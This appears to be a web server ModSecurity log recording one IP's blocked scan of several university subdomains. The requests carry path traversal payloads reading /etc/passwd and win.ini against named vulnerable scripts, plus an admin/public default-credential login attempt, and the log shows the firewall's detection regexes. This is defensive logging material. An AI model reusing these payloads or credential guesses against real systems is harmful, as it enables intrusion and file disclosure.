[Tue Aug 29 11:44:44.383627 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:name: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/jnoj/web/polygon/problem/viewfile"] [unique_id "ZO13vMCo-f0AAAfg71wAAAAe"]
[Tue Aug 29 11:44:44.383849 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:name: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/jnoj/web/polygon/problem/viewfile"] [unique_id "ZO13vMCo-f0AAAgzyP0AAAAF"]
[Tue Aug 29 11:44:44.391427 2023] [:error] [pid 2005] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:name: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/jnoj/web/polygon/problem/viewfile"] [unique_id "ZO13vMCo-f0AAAfVkeIAAAAD"]
[Tue Aug 29 11:44:44.427799 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:name: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/jnoj/web/polygon/problem/viewfile"] [unique_id "ZO13vMCo-f0AAAfGafYAAAAT"]
[Tue Aug 29 11:44:44.429293 2023] [:error] [pid 2110] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/mypixs/mypixs/downloadpage.php"] [unique_id "ZO13vMCo-f0AAAg@AAUAAAAQ"]
[Tue Aug 29 11:44:45.593147 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:name: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/jnoj/web/polygon/problem/viewfile"] [unique_id "ZO13vcCo-f0AAAfZj8EAAAAN"]
[Tue Aug 29 11:44:47.362963 2023] [:error] [pid 2124] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/spreadsheet-reader/test.php"] [unique_id "ZO13v8Co-f0AAAhMtTUAAAAM"]
[Tue Aug 29 11:44:47.639267 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/spreadsheet-reader/test.php"] [unique_id "ZO13v8Co-f0AAAfSWeIAAAAB"]
[Tue Aug 29 11:44:47.657037 2023] [:error] [pid 2005] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/spreadsheet-reader/test.php"] [unique_id "ZO13v8Co-f0AAAfVkfYAAAAD"]
[Tue Aug 29 11:44:47.660460 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/spreadsheet-reader/test.php"] [unique_id "ZO13v8Co-f0AAAdOee4AAAAS"]
[Tue Aug 29 11:44:47.675693 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:redirect: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO13v8Co-f0AAAdQ3tgAAAAV"]
[Tue Aug 29 11:44:47.682021 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/spreadsheet-reader/test.php"] [unique_id "ZO13v8Co-f0AAARphGgAAAAU"]
[Tue Aug 29 11:44:47.684366 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS_NAMES:{"username":"admin","password":"public"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22username\\x22:\\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/api/v4/auth"] [unique_id "ZO13v8Co-f0AAAdOee8AAAAS"]
[Tue Aug 29 11:44:47.685636 2023] [:error] [pid 2005] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"username":"admin","password":"public"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/api/v4/auth"] [unique_id "ZO13v8Co-f0AAAfVkfcAAAAD"]
[Tue Aug 29 11:44:47.689113 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS_NAMES:{"username":"admin","password":"public"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22username\\x22:\\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "informatika.unla.ac.id"] [uri "/api/v4/auth"] [unique_id "ZO13v8Co-f0AAAfg73AAAAAe"]
[Tue Aug 29 11:44:47.735789 2023] [:error] [pid 2120] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:,.*?[)\\\\da-f\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98][\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98](?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98].*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|\\\\Z|[^\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]+))|(?:\\\\Wselect.+\\\\W*?from)|((? ..." at ARGS_NAMES:{"username":"admin","password":"public"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "209"] [id "981257"] [msg "Detects MySQL comment-/space-obfuscated injections and backtick termination"] [data "Matched Data: ,\\x22password\\x22: found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "ft.unla.ac.id"] [uri "/api/v4/auth"] [unique_id "ZO13v8Co-f0AAAhISOIAAAAH"]
[Tue Aug 29 11:44:47.783572 2023] [:error] [pid 2110] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"username":"admin","password":"public"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/v4/auth"] [unique_id "ZO13v8Co-f0AAAg@AAoAAAAQ"]
[Tue Aug 29 11:44:48.412938 2023] [:error] [pid 2020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:code: ../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/plus/carbuyaction.php"] [unique_id "ZO13wMCo-f0AAAfkzDQAAAAi"]
[Tue Aug 29 11:44:48.413042 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:code: ../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/plus/carbuyaction.php"] [unique_id "ZO13wMCo-f0AAAfiYq8AAAAg"]
[Tue Aug 29 11:44:48.416172 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:redirect: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO13wMCo-f0AAAe3@GkAAAAA"]
[Tue Aug 29 11:44:48.416349 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:code: ../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/plus/carbuyaction.php"] [unique_id "ZO13wMCo-f0AAAdQ3tsAAAAV"]
[Tue Aug 29 11:44:48.428095 2023] [:error] [pid 2111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:redirect: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO13wMCo-f0AAAg-pKgAAAAR"]
[Tue Aug 29 11:44:48.429651 2023] [:error] [pid 2029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS_NAMES:{"username":"admin","password":"public"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22username\\x22:\\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/api/v4/auth"] [unique_id "ZO13wMCo-f0AAAftVHoAAAAf"]
[Tue Aug 29 11:44:48.437098 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/nuovo/spreadsheet-reader/test.php"] [unique_id "ZO13wMCo-f0AAAdQ3twAAAAV"]
[Tue Aug 29 11:44:48.439152 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/nuovo/spreadsheet-reader/test.php"] [unique_id "ZO13wMCo-f0AAAgzyQUAAAAF"]
[Tue Aug 29 11:44:48.439370 2023] [:error] [pid 2020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:code: ../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plus/carbuyaction.php"] [unique_id "ZO13wMCo-f0AAAfkzDUAAAAi"]
[Tue Aug 29 11:44:48.443219 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:redirect: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO13wMCo-f0AAAfEBzEAAAAO"]
[Tue Aug 29 11:44:48.447168 2023] [:error] [pid 2111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/nuovo/spreadsheet-reader/test.php"] [unique_id "ZO13wMCo-f0AAAg-pKkAAAAR"]
[Tue Aug 29 11:44:48.463084 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO13wMCo-f0AAAfEBzIAAAAO"]
[Tue Aug 29 11:44:48.475985 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/nuovo/spreadsheet-reader/test.php"] [unique_id "ZO13wMCo-f0AAAdOefQAAAAS"]
[Tue Aug 29 11:44:48.489472 2023] [:error] [pid 2012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:code: ../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/plus/carbuyaction.php"] [unique_id "ZO13wMCo-f0AAAfcoUoAAAAa"]
[Tue Aug 29 11:44:49.369751 2023] [:error] [pid 2012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/spreadsheet-reader/test.php"] [unique_id "ZO13wcCo-f0AAAfcoUsAAAAa"]
[Tue Aug 29 11:44:49.392943 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:url: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO13wcCo-f0AAAfZj8kAAAAN"]
[Tue Aug 29 11:44:49.393761 2023] [:error] [pid 2012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:code: ../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/plus/carbuyaction.php"] [unique_id "ZO13wcCo-f0AAAfcoUwAAAAa"]
[Tue Aug 29 11:44:49.394986 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/nuovo/spreadsheet-reader/test.php"] [unique_id "ZO13wcCo-f0AAAfbktkAAAAZ"]
[Tue Aug 29 11:44:49.420990 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO13wcCo-f0AAAfiYrUAAAAg"]
[Tue Aug 29 11:44:49.421170 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO13wcCo-f0AAAfZj8oAAAAN"]
